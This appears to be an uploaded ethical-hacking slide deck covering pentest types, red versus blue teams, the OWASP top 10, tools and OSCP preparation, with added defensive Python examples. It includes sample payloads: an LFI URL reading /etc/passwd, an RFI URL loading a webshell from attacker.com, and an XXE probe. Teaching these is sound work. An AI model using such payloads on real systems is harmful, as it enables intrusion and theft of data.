00 - Ethical Hacking and Pentesting

The document provides an overview of ethical hacking and penetration testing. It discusses key topics such as:
- The definition, objectives, and types of penetration testing including network services testing, client-side testing, and web application testing.
- The differences between red team cyber attacks which simulate real-world attacks to test security vulnerabilities versus blue team defensive security strategies like infrastructure protection and incident response.
- Common attacker profiles including state-sponsored attackers, organized crime, criminals, and recreational hackers.
- A sample penetration testing methodology covering approaches like social engineering, firewall testing, password strength testing, and application security testing.
- The OWASP top 10 web application security risks such as injection flaws and broken

Uploaded by Sabrine Aydi
ETHICAL HACKING AND PENTESTING

AGENDA
01 PENETRATION TESTING: DEFINITION & OBJECTIVES & TYPES
02 RED TEAM CYBER VS BLUE TEAM AND BAD PYRAMID
03 RESPONSIBILITIES OF CYBER SECURITY EXPERTS AND ATTACKER PROFILES
04 USE CASE: RED TEAM APT AND WEB PEN TESTING
05 SANS BLUE PRINT FOR PENETRATION TESTING
06 IT CERTIFICATION ROADMAP
PENETRATION TESTING: DEFINITION & OBJECTIVES

PEN TESTING
An approach, modeling tactics of real-world bad guys, to find vulnerabilities, then under controlled circumstances, exploit those vulnerabilities and determine business risk.

VUL. ASSESSMENT
Finding security vulnerabilities, which may or may not be used to get in or steal data.

Purpose
The ultimate goal is discovering flaws so that they can be remediated (applying patches, reconfiguring systems,
altering the architecture, changing processes, etc.).
Types of Penetration Tests

01 NETWORK SERVICES
Finding target systems on a network.

02 CLIENT-SIDE
Designed to find and exploit client-side software, such as browsers, media players, doc editing programs, etc.

03 WEB APPLICATION
Targets web-based applications in the target environment.

04 WIRELESS SECURITY
Targets the physical environment to find unauthorized wireless access points or insecure access points.

05 SOCIAL ENGINEERING
Attempts to dupe a user into revealing sensitive information or clicking on a malicious link in an email.

06 WAR DIALING
One of the many avenues of entry/information gain is via remote access through a dial-up connection to other phone-controlled systems (IVR, DISA, etc.). The attack method is known as War Dialing and is now easier to perform due to the explosion in VoIP services and providers.
RED TEAM CYBER VS BLUE TEAM

Offensive Security
• Ethical Hacking
• Exploiting vulnerabilities
• Pen Testing
• Black Box Testing
• Social Engineering
• Web App Scanning

Defensive Security
• Infrastructure Protection
• Damage Control
• IR: Incident Response
• Operational Security
• Threat Hunters
• Digital Forensics


Red team cyber VS Blue Team

Blue Team
• Identify the intrusions on alert systems
• Identify the type of attacks
• Block the attacks before their success
• Alert the teams for reactive/preventive action once detected
• Activate runbooks for incident response
• Activate the hunting and containment of the infected PCs
• Identify and train the physical teams to identify spoofing
• Enhance the access card security

RED Team
• Simulated cyber attacks
• Intrusion attempts
• Insider threat
• Remote attacks from the internet
• VPN based attacks
• DNS tunneling
• ICMP tunneling
• Simulated physical intrusion to sensitive areas
• Access card copy and strength test
• Identity spoof
RED TEAM CYBER VS BLUE TEAM: BAD PYRAMID
ATTACKER PROFILES

State sponsored
- Cyberwar, state secret, industrial espionage
- Highly sophisticated
- Unlimited resources
- APT

Hacktivist
- Statement
- Relentless emotionally committed
- Vast networks
- Targeted attacks
Organized Crime
- Economic gain
- Significant technical resources
- Established syndicates
Recreational
- Fame and notoriety
- Limited technical resources
- Known Exploits
Criminal
- Vandalism
- Limited technical capabilities
USE CASE : RED TEAM APT ATTACK LIFECYCLE
PEN TESTING METHODOLOGY
TESTING APPROACHES

• Manual Vulnerability Testing and Verification
• Firewall and ACL Testing
• Intrusion Detection/Prevention System Testing
• Password Strength Testing
• External Network Scan for Known Trojan/Hacker Ports
• Internal Network Scan for Known Trojan/Hacker Ports
• Social Engineering Attacks
• Physical Security
• Manual Configuration Weakness Testing and Verification
• User Rights Testing
• Network Equipment Security Controls Testing
• Database Security Controls Testing
• Application Testing
OWASP TOP 10 vulnerabilities

A1 Injection

Exploitability score: Easy
Detectability score: Easy
Technical Impact score: Severe

A2 Broken Authentication

The risk of broken authentication is not restricted to a set attack pattern or specific application vulnerability. An application becomes vulnerable when adequate user authentication controls are improperly implemented or overlooked altogether, increasing the risk of user accounts being breached. OWASP outlines the three primary attack patterns that exploit weak authentication:

1. credential stuffing
2. brute force access
3. session hijacking

Exploitability score: Easy
Detectability score: Average
Technical Impact score: Severe
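The three attack patterns above each leave a distinct trace in authentication logs. The following is an added detection example, not code from the original slides; the log format, field layout and thresholds are assumptions made for the demo.

```python
# Added example, not from the original slides: flag the three broken-authentication
# patterns the slide lists from constructed web-server auth log lines.
# The log format and the thresholds are assumptions chosen for this demo.
import re
from collections import defaultdict

# Constructed sample: "<source-ip> <username> <OK|FAIL> <session-id or ->"
SAMPLE_LOG = """\
203.0.113.7 alice FAIL -
203.0.113.7 bob FAIL -
203.0.113.7 carol FAIL -
198.51.100.9 admin FAIL -
198.51.100.9 admin FAIL -
198.51.100.9 admin FAIL -
192.0.2.10 alice OK s-1111
192.0.2.11 alice OK s-1111
"""
LINE_RE = re.compile(r"^(\S+) (\S+) (OK|FAIL) (\S+)$")

def classify(log_text, fail_threshold=3, user_spread=3):
    """Return {pattern: [indicator, ...]} for the suspicious activity found."""
    fails_by_ip = defaultdict(list)     # ip -> usernames that failed
    ips_by_session = defaultdict(set)   # session id -> source ips using it
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                    # ignore lines in an unexpected format
        ip, user, result, sess = m.groups()
        if result == "FAIL":
            fails_by_ip[ip].append(user)
        elif sess != "-":
            ips_by_session[sess].add(ip)
    alerts = defaultdict(list)
    for ip, users in fails_by_ip.items():
        if len(users) < fail_threshold:
            continue
        # Credential stuffing replays leaked pairs against MANY accounts;
        # brute force hammers ONE account from the same source.
        if len(set(users)) >= user_spread:
            alerts["credential_stuffing"].append(ip)
        else:
            alerts["brute_force"].append(ip)
    # A session cookie reused from a second source IP suggests hijacking.
    for sess, ips in ips_by_session.items():
        if len(ips) > 1:
            alerts["session_hijacking"].append(sess)
    return dict(alerts)
```

On real logs the thresholds need tuning per application, and shared NAT addresses will raise the false-positive rate for the first two patterns.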

A3 Sensitive Data Exposure

“An attacker can simply monitor the network traffic, intercept the TLS, and steal the user’s session cookie. The attacker then replays this cookie and hijacks the user’s (authenticated) session, accessing or modifying the user’s private data. This attack can be modified in other ways such as changing the recipient of a money transfer.” – OWASP

A4 XML External Entities (XXE)

An XML attack happens when an application that parses XML input is attacked. The attack can occur when XML input contains a reference to an external entity and when the reference is processed by a weakly configured XML parser. Such an attack may lead to the disclosure of sensitive data, DoS attack, server-side request forgery, and so on.
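The "weakly configured parser" in the paragraph above is the part a defender controls. The following added example, not code from the original slides, gates untrusted XML before it reaches the standard-library parser; the function names, the sample documents and the placeholder URI are assumptions made for the demo.

```python
# Added example, not from the original slides: a pre-parse gate that refuses
# XML carrying a DOCTYPE with entity declarations (the XXE entry point), then
# parses the remaining input with the standard library. Function names are mine.
import re
import xml.etree.ElementTree as ET

DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)
ENTITY_RE = re.compile(r"<!ENTITY\b.*?\b(SYSTEM|PUBLIC)\b", re.IGNORECASE | re.DOTALL)

def describe_risk(xml_text):
    """Return None when the document is acceptable, else a short reason."""
    if ENTITY_RE.search(xml_text):
        return "external entity declaration (SYSTEM/PUBLIC)"
    if DOCTYPE_RE.search(xml_text):
        # Internal DTDs still allow entity-expansion DoS tricks; reject them too.
        return "DOCTYPE not allowed"
    return None

def parse_untrusted(xml_text):
    """Parse only documents that pass the gate; raise ValueError otherwise."""
    reason = describe_risk(xml_text)
    if reason is not None:
        raise ValueError("rejected XML input: " + reason)
    return ET.fromstring(xml_text)

# Constructed inputs: a benign order document and an XXE-style probe whose
# SYSTEM URI is a placeholder, not a real path or target.
BENIGN = "<order><item sku='A-1'>2</item></order>"
XXE_PROBE = (
    "<?xml version='1.0'?>"
    "<!DOCTYPE order [<!ENTITY ext SYSTEM 'file:///PLACEHOLDER_PATH'>]>"
    "<order><item>&ext;</item></order>"
)

def gate_results():
    """Run both samples through the gate: (sku parsed, probe blocked)."""
    ok = parse_untrusted(BENIGN).find("item").get("sku")
    try:
        parse_untrusted(XXE_PROBE)
        blocked = False
    except ValueError:
        blocked = True
    return ok, blocked
```

In production, prefer a parser configured to disable DTD processing (the defusedxml package wraps the standard library parsers this way) and keep a gate like this as defence in depth.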

A5 Broken Access Control

Access control or authorization in a web application means that the app puts a limit on what content and functions should be available to different users.

Broken access control is the problem that emerges when the application doesn't have a centralized access control, resulting in scattered, complicated schemes that lead developers to make mistakes and leave vulnerabilities open.

Examples:
File Path Traversal
Local File Inclusion (LFI)
Remote File Inclusion (RFI)

LFI: Usage Example
You create several modules for one page and, to include them, you use the GET parameter with the filename of the respective function, such as:
https://example.com/?module=contact.php

The Risks of Introducing a Local File Inclusion Vulnerability
https://example.com/?module=/etc/passwd

RFI: Usage Example
https://example.com/index.php?page=https://attacker.com/uploads/webshell.php
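The ?module=<file> pattern above is the whole vulnerability: the include path is built directly from a request parameter. The following added example, not code from the original slides, shows that lookup in Python beside a hardened version that combines an allowlist with a real-path containment check; the directory layout, module names and function names are assumptions made for the demo.

```python
# Added example, not from the original slides: the ?module=<file> include pattern
# from the slide, first as the unsafe lookup that enables LFI/RFI, then hardened
# with an allowlist plus a real-path check. Paths and names are my assumptions.
import os
import tempfile

def build_module_dir():
    """Create a throwaway modules directory with one legitimate module."""
    base = tempfile.mkdtemp(prefix="modules-")
    with open(os.path.join(base, "contact.php"), "w") as fh:
        fh.write("<?php echo 'contact form'; ?>")
    return base

def resolve_unsafe(base, module):
    """Vulnerable: trusts the GET parameter, so an absolute path or '../'
    walks out of base (LFI); an include() with allow_url_include would
    additionally fetch a URL value (RFI)."""
    return os.path.join(base, module)

def resolve_safe(base, module):
    """Hardened: name must be in the allowlist AND resolve inside base."""
    allowlist = {"contact.php", "about.php"}
    if module not in allowlist:
        return None
    real_base = os.path.realpath(base)
    target = os.path.realpath(os.path.join(real_base, module))
    if os.path.commonpath([real_base, target]) != real_base:
        return None                     # symlink or traversal escaped base
    return target if os.path.isfile(target) else None

def compare(base, module):
    """Return (unsafe_path_escapes_base, safe_lookup_refused) for one request."""
    real_base = os.path.realpath(base)
    unsafe = os.path.realpath(resolve_unsafe(base, module))
    escapes = os.path.commonpath([real_base, unsafe]) != real_base
    return escapes, resolve_safe(base, module) is None
```

The allowlist alone would already stop both slide URLs; the real-path check is there because allowlisted names can still point outside the directory through symlinks.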
TOOLS (1/2)

VMWARE WORKSTATION
Run multiple operating systems as virtual machines (including Linux or Windows VMs) for development and testing.

WPSCAN
WPScan is a free, for non-commercial use, black box WordPress vulnerability scanner written for security professionals to test the security of sites.

NETCAT
Netcat is a versatile networking tool that can be used to interact with computers using UDP or TCP connections.

DROOPESCAN
A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe.

FIREFOX INSPECTOR
The inspector is used to review and modify the HTML and CSS of a web page.

TOOLS (2/2)

EXPLOIT DB
Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials, …

NMAP
Nmap Free Security Scanner, Port Scanner, & Network Exploration Tool.

SQLMAP
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

PYTHON
Python is an interpreted, high-level, general-purpose programming language. It provides constructs that enable clear programming on both small and large scales.

DIRBUSTER
DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers.
CYBERSECURITY DAYS OF
GABES UNIVERSITY -2019
REPORTING
IT Certification Roadmap

• Offensive Security Certified Professional (OSCP) is a certification program that focuses on hands-on offensive information security skills.
• It consists of two parts: a nearly 24-hour pen testing exam, and a documentation report due 24 hours after it.
• You are required to take the Penetration Testing with Kali (PWK) course.

Course Pricing
• PWK + 30 days Lab access + OSCP Exam Certification USD 800.00
• PWK + 60 days Lab access + OSCP Exam Certification USD 1000.00
• PWK + 90 days Lab access + OSCP Exam Certification USD 1150.00
• OSCP Certification Exam Retake USD 150.00

1. Linux and Windows Environment - You need to be familiar with both. These will help you spot clues for privilege escalation.
2. Linux and Windows Commands - Knowing Linux and Windows commands helps a lot.
3. Basic Programming Skills - Expect to debug and rewrite exploits, so know Bash Scripting. This will help you to automate redundant tasks.
4. Web application attacks (SQLi, XSS, Local File Inclusion, Remote File Inclusion, and Command Execution)
5. Metasploit Framework
6. Nmap - Different scanning techniques and Nmap NSE
7. Netcat - You’ll be using these a lot during the OSCP.
8. Wireshark and tcpdump - Those are important because you’ll be using Wireshark to debug your exploit - or tcpdump, when machines don’t have a GUI.
9. Windows and Linux Privilege Escalation - Aside from using kernel exploits, brush up on misconfigurations like weak service/file permissions and NFS/Shares.
10. Escaping restricted shells and spawning shells - You’ll encounter these a lot during your OSCP.
11. File transfer - It is important that you know the different techniques to transfer files to a target machine.
